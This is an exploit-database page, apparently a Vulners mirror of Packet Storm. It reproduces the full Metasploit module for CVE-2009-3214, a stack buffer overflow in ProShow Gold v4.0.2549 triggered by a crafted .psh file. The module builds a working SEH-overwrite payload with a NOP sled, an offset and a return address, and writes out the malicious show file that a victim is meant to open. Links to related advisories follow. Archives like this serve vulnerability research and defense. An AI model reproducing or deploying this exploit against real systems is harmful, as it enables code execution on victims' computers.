Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJduckPACKETSTORM:84554
HistoryDec 31, 2009 - 12:00 a.m.

ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow

2009-12-3100:00:00
jduck
packetstormsecurity.com
18

EPSS

0.733

Percentile

98.1%

JSON
`##  
# $Id: proshow_cellimage_bof.rb 7911 2009-12-18 00:19:04Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.  
An attacker must send the file to victim and the victim must open the file.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'jduck' ],  
'Version' => '$Revision: 7911 $',  
'References' =>  
[  
[ 'CVE', '2009-3214' ],  
[ 'OSVDB', '57226' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/9483' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/9519' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},   
'Payload' =>  
{  
'Space' => 1000,  
'BadChars' => "\x00\x0a\x0d",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
# 0x01a614ea # p/p/r @ all.dnt   
[ 'Windows Universal', { 'Offset' => 4036, 'Ret' => 0x101a4cf9 } ], # p/p/r if.dnt  
],  
'Privileged' => false,  
'DisclosureDate' => 'Aug 20 2009',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'The file name.', 'msf.psh']),  
], self.class)  
end  
  
def exploit  
  
sploit = make_nops(target['Offset'] - 4 - payload.encoded.length)  
sploit << payload.encoded  
sploit << generate_seh_record(target.ret)  
  
# note, just in case the arguments get modified, we'll jump back into our buffer...  
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + target['Offset'].to_s).encode_string  
  
# cause exception hitting the end of the stack  
sploit << rand_text(1000) * 13  
  
content = "Photodex(R) ProShow(TM) Show File Version=0\r\n"  
content << "cells=1\r\n"  
content << "cell[0].nrOfImages=1\r\n"  
content << "cell[0].images[0].image=" << sploit << "\r\n"  
  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
file_create(content)  
  
end  
  
end  
`

Related

exploitdb 3
nvd 1
checkpoint_advisories 1
prion 1
metasploit 1
cvelist 1
cve 1
exploitdb
exploitdb
ProShow Producer / Gold 4.0.2549 - &#039;.psh&#039; Universal Buffer Overflow (SEH)
2009-08-25 00:00:00
ProShow Gold 4.0.2549 - &#039;.psh&#039; Local Stack Buffer Overflow (Metasploit)
2010-09-25 00:00:00
Photodex ProShow Gold 4 (Windows XP SP3) - &#039;.psh&#039; Universal Buffer Overflow (SEH)
2009-08-24 00:00:00
nvd
nvd
CVE-2009-3214
2009-09-16 17:30:00
checkpoint_advisories
checkpoint_advisories
ProShow Gold file based Buffer Overflow - Ver2 (CVE-2009-3214)
2014-04-16 00:00:00
prion
prion
Stack overflow
2009-09-16 17:30:00
metasploit
metasploit
ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
2009-12-18 00:19:04
cvelist
cvelist
CVE-2009-3214
2009-09-16 17:00:00
cve
cve
CVE-2009-3214
2009-09-16 17:30:00

EPSS

0.733

Percentile

98.1%

JSON
Related for PACKETSTORM:84554
exploitdb3nvd1checkpoint_advisories1prion1metasploit1cvelist1cve1